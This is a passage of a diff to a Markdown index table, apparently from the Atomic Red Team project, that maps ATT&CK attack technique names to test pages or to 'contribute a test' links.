-| | | [PowerShell Profile](../../T1546.013/T1546.013.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Screensaver](../../T1546.002/T1546.002.md) | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | [Rc.common](../../T1037.004/T1037.004.md) | [Security Support Provider](../../T1547.005/T1547.005.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | [Re-opened Applications](../../T1547.007/T1547.007.md) | Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Modify Registry](../../T1112/T1112.md) | | | | | | | |
-| | | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | [Mshta](../../T1218.005/T1218.005.md) | | | | | | | |
-| | | SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Shortcut Modification](../../T1547.009/T1547.009.md) | [Msiexec](../../T1218.007/T1218.007.md) | | | | | | | |
-| | | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | [Startup Items](../../T1037.005/T1037.005.md) | [NTFS File Attributes](../../T1564.004/T1564.004.md) | | | | | | | |
-| | | [Scheduled Task](../../T1053.005/T1053.005.md) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [Network Share Connection Removal](../../T1070.005/T1070.005.md) | | | | | | | |
-| | | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Systemd Service](../../T1543.002/T1543.002.md) | [Obfuscated Files or Information](../../T1027/T1027.md) | | | | | | | |
-| | | [Screensaver](../../T1546.002/T1546.002.md) | Thread Execution Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Odbcconf](../../T1218.008/T1218.008.md) | | | | | | | |
-| | | [Security Support Provider](../../T1547.005/T1547.005.md) | Thread Local Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Parent PID Spoofing](../../T1134.004/T1134.004.md) | | | | | | | |
-| | | Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Hash](../../T1550.002/T1550.002.md) | | | | | | | |
-| | | Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Token Impersonation/Theft](../../T1134.001/T1134.001.md) | [Pass the Ticket](../../T1550.003/T1550.003.md) | | | | | | | |
-| | | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Trap](../../T1546.005/T1546.005.md) | [Password Filter DLL](../../T1556.002/T1556.002.md) | | | | | | | |
-| | | [Shortcut Modification](../../T1547.009/T1547.009.md) | VDSO Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | [Startup Items](../../T1037.005/T1037.005.md) | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | System Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | | | | | | | |
-| | | [Systemd Service](../../T1543.002/T1543.002.md) | [Windows Service](../../T1543.003/T1543.003.md) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Winlogon Helper DLL](../../T1547.004/T1547.004.md) | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | [Transport Agent](../../T1505.002/T1505.002.md) | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | [Trap](../../T1546.005/T1546.005.md) | | Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | [Web Shell](../../T1505.003/T1505.003.md) | | [Process Hollowing](../../T1055.012/T1055.012.md) | | | | | | | |
-| | | [Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | | [Process Injection](../../T1055/T1055.md) | | | | | | | |
-| | | [Windows Service](../../T1543.003/T1543.003.md) | | Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | [Winlogon Helper DLL](../../T1547.004/T1547.004.md) | | [PubPrn](../../T1216.001/T1216.001.md) | | | | | | | |
+| Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppleScript](../../T1059.002/T1059.002.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [/etc/passwd and /etc/shadow](../../T1003.008/T1003.008.md) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Automated Exfiltration](../../T1020/T1020.md) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Access Removal](../../T1531/T1531.md) |
+| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [Accessibility Features](../../T1546.008/T1546.008.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Window Discovery](../../T1010/T1010.md) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive Collected Data](../../T1560/T1560.md) | [Data Transfer Size Limits](../../T1030/T1030.md) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [Account Manipulation](../../T1098/T1098.md) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AS-REP Roasting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | [Distributed Component Object Model](../../T1021.003/T1021.003.md) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Accessibility Features](../../T1546.008/T1546.008.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Bash History](../../T1552.003/T1552.003.md) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
+| [Default Accounts](../../T1078.001/T1078.001.md) | Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Additional Cloud Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [Binary Padding](../../T1027.001/T1027.001.md) | Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Infrastructure Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DNS](../../T1071.004/T1071.004.md) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Instance Metadata API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Service Dashboard [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Hash](../../T1550.002/T1550.002.md) | [Automated Collection](../../T1119/T1119.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Data Exchange](../../T1559.002/T1559.002.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Ticket](../../T1550.003/T1550.003.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| [External Remote Services](../../T1133/T1133.md) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | [At (Linux)](../../T1053.001/T1053.001.md) | [CMSTP](../../T1218.003/T1218.003.md) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Account](../../T1087.002/T1087.002.md) | [RDP Hijacking](../../T1563.002/T1563.002.md) | Confluence [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [At (Windows)](../../T1053.002/T1053.002.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Credentials In Files](../../T1552.001/T1552.001.md) | [Domain Groups](../../T1069.002/T1069.002.md) | [Remote Desktop Protocol](../../T1021.001/T1021.001.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Inter-Process Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](../../T1070.003/T1070.003.md) | [Credentials from Password Stores](../../T1555/T1555.md) | [Domain Trust Discovery](../../T1482/T1482.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Cloud Storage Object [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchctl](../../T1569.001/T1569.001.md) | [BITS Jobs](../../T1197/T1197.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Windows Event Logs](../../T1070.001/T1070.001.md) | [Credentials in Registry](../../T1552.002/T1552.002.md) | [File and Directory Discovery](../../T1083/T1083.md) | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Configuration Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| [Spearphishing Attachment](../../T1566.001/T1566.001.md) | [Launchd](../../T1053.004/T1053.004.md) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DCSync [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Account](../../T1087.001/T1087.001.md) | [SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Encrypted Channel](../../T1573/T1573.md) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Malicious File](../../T1204.002/T1204.002.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [COR_PROFILER](../../T1574.012/T1574.012.md) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Groups](../../T1069.001/T1069.001.md) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Inhibit System Recovery](../../T1490/T1490.md) |
+| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Change Default File Association](../../T1546.001/T1546.001.md) | [Compile After Delivery](../../T1027.004/T1027.004.md) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Traffic Duplication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Native API](../../T1106/T1106.md) | [Browser Extensions](../../T1176/T1176.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Compiled HTML File](../../T1218.001/T1218.001.md) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](../../T1135/T1135.md) | Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Device CLI [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [COR_PROFILER](../../T1574.012/T1574.012.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Network Sniffing](../../T1040/T1040.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [PowerShell](../../T1059.001/T1059.001.md) | [Change Default File Association](../../T1546.001/T1546.001.md) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Control Panel](../../T1218.002/T1218.002.md) | Golden Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](../../T1201/T1201.md) | Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Group Policy Preferences](../../T1552.006/T1552.006.md) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | | [Internal Proxy](../../T1090.001/T1090.001.md) | [Resource Hijacking](../../T1496/T1496.md) |
+| | [Scheduled Task](../../T1053.005/T1053.005.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Create Snapshot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Kerberoasting](../../T1558.003/T1558.003.md) | [Process Discovery](../../T1057/T1057.md) | Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Keylogging](../../T1056.001/T1056.001.md) | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Keychain](../../T1555.001/T1555.001.md) | [Query Registry](../../T1012/T1012.md) | [Windows Remote Management](../../T1021.006/T1021.006.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Stop](../../T1489/T1489.md) |
+| | [Service Execution](../../T1569.002/T1569.002.md) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Keylogging](../../T1056.001/T1056.001.md) | [Remote System Discovery](../../T1018/T1018.md) | | [Local Data Staging](../../T1074.001/T1074.001.md) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | Shared Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | [Local Email Collection](../../T1114.001/T1114.001.md) | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
+| | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Delete Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [LSA Secrets](../../T1003.004/T1003.004.md) | [Software Discovery](../../T1518/T1518.md) | | Man in the Browser [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Non-Application Layer Protocol](../../T1095/T1095.md) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | [LSASS Memory](../../T1003.001/T1003.001.md) | [System Checks](../../T1497.001/T1497.001.md) | | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Direct Volume Access](../../T1006/T1006.md) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) | | Network Device Configuration Dump [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Non-Standard Port](../../T1571/T1571.md) | |
+| | Systemd Timers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Emond](../../T1546.014/T1546.014.md) | Disable Cloud Logs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | [Unix Shell](../../T1059.004/T1059.004.md) | [Default Accounts](../../T1078.001/T1078.001.md) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disable Crypto Hardware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [NTDS](../../T1003.003/T1003.003.md) | [System Network Connections Discovery](../../T1049/T1049.md) | | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Account](../../T1136.002/T1136.002.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable Windows Event Logging](../../T1562.002/T1562.002.md) | Network Device Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Owner/User Discovery](../../T1033/T1033.md) | | SNMP (MIB Dump) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | [Visual Basic](../../T1059.005/T1059.005.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | [System Service Discovery](../../T1007/T1007.md) | | [Screen Capture](../../T1113/T1113.md) | | Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | [Windows Command Shell](../../T1059.003/T1059.003.md) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | [OS Credential Dumping](../../T1003/T1003.md) | [System Time Discovery](../../T1124/T1124.md) | | Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
